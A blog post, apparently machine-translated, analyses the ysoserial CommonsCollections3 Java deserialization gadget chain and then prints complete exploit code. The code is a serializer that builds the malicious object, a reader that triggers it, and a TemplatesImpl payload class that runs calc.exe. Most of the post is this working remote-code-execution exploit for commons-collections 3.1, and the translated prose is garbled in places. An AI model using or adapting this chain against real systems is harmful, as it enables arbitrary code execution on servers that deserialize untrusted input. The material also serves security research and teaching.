Java deserialization – ysoserial – debugging analysis summary (3)

Time:2020-4-28

preface:

This article mainly analyzes commoncollections3. This utilization chain is described by YSO. It is similar to CC1, except that the reflection call method is not invoketransformer, but instantiaetransformer. The whole call process is as follows

Using chain analysis:

As shown in the figure above, the entry point is also the entryset of annotation invocation handler

At this time, membervalues.get will be called, where VAR4 bit entryset, and the stored instance in membervalues is the instance of lazymap class, that is, the get function of lazymap will be called

Then we call chainedtransformer to transform the key

In itransformer, except for the constanttransformer direct return class, the class used here is class com.sun.org.apache.xalan.internal.xsltc.trax.traxfilter

Next, we go to the transformer function of instantiatetransformer, where we will get the constructor whose parameter type of the input corresponding class is templates, and then instantiate it

Then follow the path to the constructor of traxfilter. You can see that templates.newtransformer is actually called here. Then we know that templatesimpl can use ﹣ bytecode ﹣

The next process is not described, but the use of templates class

YSO structure analysis:

When YSO constructs the payload here, constanttransformer returns the traxfilter class, and then combines the transform function of instantiaettransformer to get the constructor of the entry parameter, and then instantiates it. In the instantiation process, it will call

Constructor of traxfilter to call templates.newtransformer

exp:

exp.java

package CommonCollections3;

import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.InstantiateTransformer;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

//
//@Dependencies({"commons-collections:commons-collections:3.1"})
//
public class exp {
    public static void main(String[] args) throws ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException, NotFoundException, IOException, CannotCompileException {

        //
        //Construct templates object
        //
        TemplatesImpl tmp = new TemplatesImpl();

        //Objects of rce code block
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(payload.class));
        CtClass pay = pool.get(payload.class.getName());
        byte[] PayCode = pay.toBytecode();

        Class clazz;
        clazz  = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Field tf = clazz.getDeclaredField("_bytecodes");
        tf.setAccessible(true);
        tf.set(tmp,new byte[][]{PayCode});
        Field name = clazz.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(tmp,"tr1ple");

        HashMap InnerMap = new HashMap();
        Transformer[] trans = new Transformer[]{
         new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{tmp}
                        )
        };

        ChainedTransformer chined = new ChainedTransformer(trans);
        Map outmap = LazyMap.decorate(InnerMap,chined);

        final Constructor con = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        con.setAccessible(true);
        InvocationHandler han = (InvocationHandler)con.newInstance(Override.class,outmap);
        Map proxy = (Map) Proxy.newProxyInstance(exp.class.getClassLoader(),outmap.getClass().getInterfaces(),han);


        //Outer layer proxy proxy
        final Constructor out_con = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        out_con.setAccessible(true);
        InvocationHandler out_han = (InvocationHandler) out_con.newInstance(Override.class,proxy);

        //Serialization
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections3.ser");
        FileOutputStream fo = new FileOutputStream(file);
        ObjectOutputStream ObjOut = new ObjectOutputStream(fo);
        ObjOut.writeObject(out_han);

    }
}

readobj.java

package CommonCollections3;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.lang.Runtime;

public class readObj {
    public static void main(String[] args) {
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections3.ser");
        try {
            ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
            obj.readObject();
            obj.close();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }

}

payload.java

package CommonCollections3;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class payload extends AbstractTranslet {
    {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public payload(){
        System.out.println("tr1ple 2333");
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

This utilization chain is also affected by the JDK version. Compared with CC2, it has limitations. Similar to CC1, the outer packaging is the same, but the inner chained transformation chain has changed